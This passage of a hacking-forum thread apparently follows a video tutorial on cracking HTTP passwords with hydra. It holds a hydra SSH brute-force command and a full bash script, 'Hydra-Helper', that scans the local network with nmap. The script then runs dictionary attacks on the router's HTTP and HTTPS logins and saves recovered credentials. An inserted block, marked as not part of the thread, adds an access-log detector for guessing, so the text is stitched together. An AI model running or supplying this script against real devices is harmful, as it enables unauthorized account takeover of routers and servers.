
Thread: [Video] How to: Crack HTTP passwords (hydra)

  1. #11
    Just burned his ISO tyl3rs123's Avatar
    Join Date
    Aug 2010
    Posts
    7

    Angry Re: [Video] How to: Crack HTTP passwords (hydra)

    Great Post...well put..good info on that

  2. #12
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Crack HTTP passwords (hydra)

    Quote Originally Posted by dareeek View Post
    What do you mean by 'basic.auth'? User is authenticated by a password.
    Index page isn't protected in any way. Connection goes through http. SSL is not used.
    basic.auth
    If the index page isn't protected, try targeting another page that is!

    Quote Originally Posted by tyl3rs123 View Post
    Great Post...well put..good info on that
    Thanks for the thanks!
    Have you...g0tmi1k?

  3. #13
    Just burned his ISO
    Join Date
    Aug 2010
    Location
    everywhere
    Posts
    2

    Question Re: [Video] How to: Crack HTTP passwords (hydra)

    Nice, but how can we set port i.e: I'm setting my sshd to listen to port 1234 and disable root access

  4. #14
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Crack HTTP passwords (hydra)

    Quote Originally Posted by rportnoy View Post
    Nice, but how can we set port i.e: I'm setting my sshd to listen to port 1234 and disable root access
    -s PORT if the service is on a different default port, define it here
    I THINK it would look something like...
    Code:
    ./hydra  -l rportnoy -P /path/to/file.lst -e ns -f -s 1234 -vV ssh2
    Have you...g0tmi1k?

  5. #15
    Just burned his ISO mamece2's Avatar
    Join Date
    Sep 2010
    Location
    Venezuela
    Posts
    10

    Default Re: [Video] How to: Crack HTTP passwords (hydra)

    I don't like when passwords are gibberish

  6. #16
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Crack HTTP passwords (hydra)

    Quote Originally Posted by mamece2 View Post
    I don't like when passwords are gibberish
    Everything has an upside & downside
    Yes, when passwords are gibberish, doing a dictionary attack is a lot harder...HOWEVER
    If it's hard for you to do it, it means it's hard for someone to do it to you
    Last edited by g0tmi1k; 09-25-2010 at 01:44 PM.
    Have you...g0tmi1k?

  7. #17
    Senior Member
    Join Date
    May 2010
    Posts
    198

    Default Re: [Video] How to: Crack HTTP passwords (hydra)

    I threw together a script for myself when I saw this. It might be useful to someone else.

    #/bin/bash echo "######### - Hydra-Helper - MfJipfVz - Pastebin.com

    Any feedback would be appreciated. Maybe an improvement? It's pretty simple but effective so far.

  8. #18
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Crack HTTP passwords (hydra)

    Quote Originally Posted by Scamentology View Post
    I threw together a script for myself when I saw this. It might be useful to someone else.

    #/bin/bash echo "######### - Hydra-Helper - MfJipfVz - Pastebin.com

    Any feedback would be appreciated. Maybe an improvement? It's pretty simple but effective so far.
    Thanks for sharing Scamentology.
    I haven't been able to test it - but doing a quick once over - *some* index pages are not protected, all the other pages are. (Seen this on two routers - gives "guests" a brief overview of the network - then you need to login to do anything else...)
    Have you...g0tmi1k?

  9. #19
    Senior Member
    Join Date
    May 2010
    Posts
    198

    Default Re: [Video] How to: Crack HTTP passwords (hydra)

    Here's the update if anyone wants it.

    Pastebin was down for me. soooo...

    Code:
    #!/bin/bash
    version=0.4                                                                                 #Set before the banner below uses it
    echo "#####################################"
    echo "   Welcome to Hydra-Helper v$version"
    echo "    Automated password cracker"
    echo " (C)opyright 2010 - Scamentology"
    echo "#####################################"
    echo "check /root/recovered.lst for results"
    echo "#####################################"
    #######################################
    # (C)opyright 2010 - Scamentology                                                              #
    #---License------------------------------------------------------------------------------------#
    #  This program is free software: you can redistribute it and/or modify it under the terms     #
    #  of the GNU General Public License as published by the Free Software Foundation, either      #
    #  version 3 of the License, or (at your option) any later version.                            #
    #                                                                                              #
    #  This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;   #
    #  without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.   #
    #  See the GNU General Public License for more details.                                        #
    #                                                                                              #
    #  You should have received a copy of the GNU General Public License along with this program.  #
    #  If not, see <http://www.gnu.org/licenses/>
    #----------------------------------------------------------------------------------------------#
    #This is my first stab at a shell script so don't be rude.
    #It was tested on the following routers
    #--Linksys WRT54G
    #--airlink-101
    #--Does not work on JAVA based routers (I gave up on that) You will just get everything as a valid pair.
    #Instructions
    #You will need to give the path to your password list then run the script
    #---------------------------------------------------------------------------------------------------------------------#
    #Must have Nmap and Hydra installed; Tested on Backtrack 4 R1
    version=0.4
    #---------------------------------------------------------------------------------------------------------------------------------#
                             dictpath=/root/pass.lst
                             userpath=/root/user.lst
                              logfile=/tmp/logfile.lst
    #
    #
    #
    #The original called action/display helpers that are not defined in this script; plain commands are used instead
    if [ ! -e "/usr/bin/nmap" ] ; then
       echo "Nmap is not installed."
       read -p ">> Would you like to try and install it? [Y/n]: " -n 1
       echo
       if [[ "$REPLY" =~ ^[Yy]$ ]] ; then apt-get -y install nmap ; fi
       if [ ! -e "/usr/share/nmap/nmap-services" ] ; then
          echo "Failed to install Nmap"
          exit 1
       else
          echo "Installed: Nmap"
       fi
    fi
    if [ ! -e "/usr/bin/hydra" ] ; then
       echo "Hydra is not installed."
       read -p ">> Would you like to try and install it? [Y/n]: " -n 1
       echo
       if [[ "$REPLY" =~ ^[Yy]$ ]] ; then apt-get -y install hydra ; fi
       if [ ! -e "/usr/bin/hydra" ] ; then
          echo "Failed to install Hydra"
          exit 1
       else
          echo "Installed: Hydra"
       fi
    fi
    echo "Nmap and Hydra are installed. Lets continue..."
    IP=$(ip route | grep default | awk '{ print $3}')                                           #Gives us The Gateway IP address
    smb=""
    https=""
    ftp=""
    telnet=""
    echo "<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>"
    echo "Finding Alive Hosts and Scanning them"
    echo "<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>"
    nmap=$(nmap -oG /tmp/nmap.lst -Pn $IP/24)                                                       #Tells us what ports are open.
    smb=$(grep '139/open' /tmp/nmap.lst | awk '{ print $2}')
    if [ "$smb" == "" ]; then echo "No Open File Shares" ; fi
       if [ "$smb" != "" ]; then grep '139/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/smb.lst ; fi    
    http=$(grep '80/open' /tmp/nmap.lst | awk '{ print $2}')
    if [ "$http" == "" ]; then echo "No HTTP Servers" ; fi
       if [ "$http" != "" ]; then grep '80/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/http.lst ; fi
    https=$(grep '443/open' /tmp/nmap.lst | awk '{ print $2}')
    if [ "$https" == "" ]; then echo "No HTTPS Servers" ; fi
       if [ "$https" != "" ]; then grep '443/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/https.lst ; fi
    ftp=$(grep '21/open' /tmp/nmap.lst | awk '{ print $2}')
    if [ "$ftp" == "" ]; then echo "No FTP Servers" ; fi
       if [ "$ftp" != "" ]; then grep '21/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/ftp.lst ; fi
    telnet=$(grep '23/open' /tmp/nmap.lst | awk '{ print $2}')
    if [ "$telnet" == "" ]; then echo "No Telnet Servers" ; fi
       if [ "$telnet" != "" ]; then grep '23/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/telnet.lst ; fi
    #---------------------------------------------------------------------------------------------------------------------#
    #
    #Router Password Guesser
    ######################################
    username=/root/Hydra/user.lst
    dictpath=/root/Hydra/pass.lst
    tasks=15
    ######################################
    if [ -e "/tmp/http.lst" ] ; then
    echo "<<<<<<<<<>>>>>>>>>>>"
    echo "Attacking on Port 80"
    echo "<<<<<<<<<>>>>>>>>>>>"
    xterm -geometry 75x15+10+215 -T "Hydra-Helper v$version - Cracking Router" -e "hydra -L $username -P $dictpath -e n -e s -t $tasks -f -w 15 -v $IP http-get / -o /tmp/tmp.lst" 
    #Only create rec1.lst when hydra reported a hit, so the later existence checks mean something
    if grep -q 'password' /tmp/tmp.lst 2>/dev/null ; then
       grep 'password' /tmp/tmp.lst >> /tmp/rec1.lst
    else
       echo "HTTP Attack Failed" >> $logfile
    fi
          #rm /tmp/tmp.lst /tmp/rec1.lst 2>/dev/null
    fi
    if [ -e "/tmp/https.lst" ] ; then
    echo "<<<<<<<<<>>>>>>>>>>>>"
    echo "Attacking on Port 443"
    echo "<<<<<<<<<>>>>>>>>>>>>"
    xterm -geometry 75x15+10+215 -T "Hydra-Helper v$version - Cracking Router" -e "hydra -L $username -P $dictpath -S -e n -e s -t $tasks -f -w 15 -v $IP https-get / -o /tmp/tmp2.lst" 
    #Only create rec2.lst when hydra reported a hit, so the later existence checks mean something
    if grep -q 'password' /tmp/tmp2.lst 2>/dev/null ; then
       grep 'password' /tmp/tmp2.lst >> /tmp/rec2.lst
    else
       echo "HTTPS Attack Failed" >> $logfile
    fi
          #rm /tmp/tmp.lst /tmp/rec2.lst 2>/dev/null
    fi
    ###############
    #insert removed code here (therest.lst)
    ###############
    #
    sleep 5
    killall xterm 2>/dev/null
    #---------------------------------------------------------------------------------------------------------------------#
    #
    #
    if [ ! -e "/tmp/rec1.lst" ] ; then
       echo "No HTTP passwords found" ; fi
    if [ -e "/tmp/rec1.lst" ] ; then
       grep 'password' /tmp/rec1.lst >> /root/recovered.lst 2>/dev/null ; fi
    if [ ! -e "/tmp/rec2.lst" ] ; then
       echo "No HTTPS passwords found" ; fi
    if [ -e "/tmp/rec2.lst" ] ; then
       grep 'password' /tmp/rec2.lst >> /root/recovered.lst 2>/dev/null ; fi
    if [ ! -e "/root/recovered.lst" ] ; then 
       echo "No passwords recovered" ; fi
    cat $logfile 2>/dev/null
    cat /root/recovered.lst
    #cleanup...
    rm /tmp/rec2.lst /tmp/rec3.lst /tmp/http.lst /tmp/https.lst /tmp/smb.lst /tmp/telnet.lst /tmp/ftp.lst /tmp/nmap.lst /tmp/rec5.lst /media/disk/mine/ISO/tools/hydra.restore 2>/dev/null
    exit
    #
    #
    #
    #todo
    #match IP addresses to passwords in /root/recovered.lst
    #add errors for missing stuff
    #add ssl support
    #add interrupt and cleanup
    #add nmap options
    #add auto time and date to details
    #add scan to detect router brand and customize attack
    I have improved the script and have added support for both http and https

    It works pretty flawlessly on my linksys wrt54g and my airlink 101 but won't work on the dlink that uses java.

    I will be adding ftp and smb support next

    Thanks. This is a learning experience for me so I'm doing this for fun..
    I know there are other tools that do this but I wanted to automate it as much as possible and improve my shell scripting (which sucks as of now).

    I seem to be addicted to this.
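
Seen from the device being tested, the http-get run that the script above automates shows up in the access log as a burst of 401 responses from one client, sometimes ended by a 200. The following detector is an added example, not part of the thread: the log lines are constructed, and the Apache common log format, the function names and the threshold of 5 are assumptions.

```bash
#!/bin/bash
# Added example (not from the thread). Log lines are constructed; Apache
# common log format and the threshold of 5 failures are assumptions.

sample_log() {
cat <<'EOF'
192.0.2.20 - - [25/Sep/2010:13:39:50 +0000] "GET /status.htm HTTP/1.1" 401 401
192.0.2.20 - alice [25/Sep/2010:13:39:55 +0000] "GET /status.htm HTTP/1.1" 200 5120
192.0.2.10 - admin [25/Sep/2010:13:40:01 +0000] "GET / HTTP/1.0" 401 401
192.0.2.10 - admin [25/Sep/2010:13:40:01 +0000] "GET / HTTP/1.0" 401 401
192.0.2.10 - root [25/Sep/2010:13:40:01 +0000] "GET / HTTP/1.0" 401 401
192.0.2.30 - admin [25/Sep/2010:13:40:02 +0000] "GET / HTTP/1.0" 401 401
192.0.2.10 - admin [25/Sep/2010:13:40:02 +0000] "GET / HTTP/1.0" 401 401
192.0.2.10 - root [25/Sep/2010:13:40:02 +0000] "GET / HTTP/1.0" 401 401
192.0.2.30 - admin [25/Sep/2010:13:40:03 +0000] "GET / HTTP/1.0" 401 401
192.0.2.10 - root [25/Sep/2010:13:40:03 +0000] "GET / HTTP/1.0" 401 401
192.0.2.30 - admin [25/Sep/2010:13:40:04 +0000] "GET / HTTP/1.0" 401 401
192.0.2.30 - admin [25/Sep/2010:13:40:05 +0000] "GET / HTTP/1.0" 401 401
192.0.2.30 - admin [25/Sep/2010:13:40:06 +0000] "GET / HTTP/1.0" 401 401
192.0.2.10 - admin [25/Sep/2010:13:40:07 +0000] "GET / HTTP/1.0" 200 5120
192.0.2.20 - alice [25/Sep/2010:13:41:10 +0000] "GET /wan.htm HTTP/1.1" 200 2048
EOF
}

# usage: detect_guessing THRESHOLD < access.log
# Prints one line per client with at least THRESHOLD 401 responses:
#   IP failures=N users=M success_as=USER|none
detect_guessing() {
  awk -v min="$1" '
    { ip = $1; user = $3; status = $(NF-1) }       # status is second to last in CLF
    status == 401 {
      fails[ip]++
      # count distinct usernames tried; "-" means no credentials were sent
      if (user != "-" && !((ip, user) in seen)) { seen[ip, user] = 1; users[ip]++ }
      next
    }
    # a 200 after enough failures: a guess probably succeeded
    status == 200 && (ip in fails) && fails[ip] >= min && !(ip in hit) { hit[ip] = user }
    END {
      for (ip in fails)
        if (fails[ip] >= min)
          printf "%s failures=%d users=%d success_as=%s\n",
                 ip, fails[ip], users[ip], ((ip in hit) ? hit[ip] : "none")
    }
  ' | sort
}

# 192.0.2.20 (one unauthenticated request, then a normal login) is not flagged
sample_log | detect_guessing 5
```

The count ignores time, so on a long-lived log apply a time window before alerting. A line with `success_as` set means that credential should be treated as guessed and changed.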

  10. #20
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Crack HTTP passwords (hydra)

    Quote Originally Posted by Scamentology View Post
    Here's the update if anyone wants it.

    Pastebin was down for me. soooo...

    I have improved the script and have added support for both http and https

    It works pretty flawlessly on my linksys wrt54g and my airlink 101 but won't work on the dlink that uses java.

    I will be adding ftp and smb support next

    Thanks. This is a learning experience for me so I'm doing this for fun..
    I know there are other tools that do this but I wanted to automate it as much as possible and improve my shell scripting (which sucks as of now).

    I seem to be addicted to this.
    Glad to see that you're still working on it, still making updates for it
    Start your own thread about it - more people will see it therefore you'll get more feedback on it! (=
    hehe, I spotted a bit of my code in there (= Glad to know it's been put to good use!
    Yep, I understand what you mean - experience, addictive & fun.
    Have you...g0tmi1k?
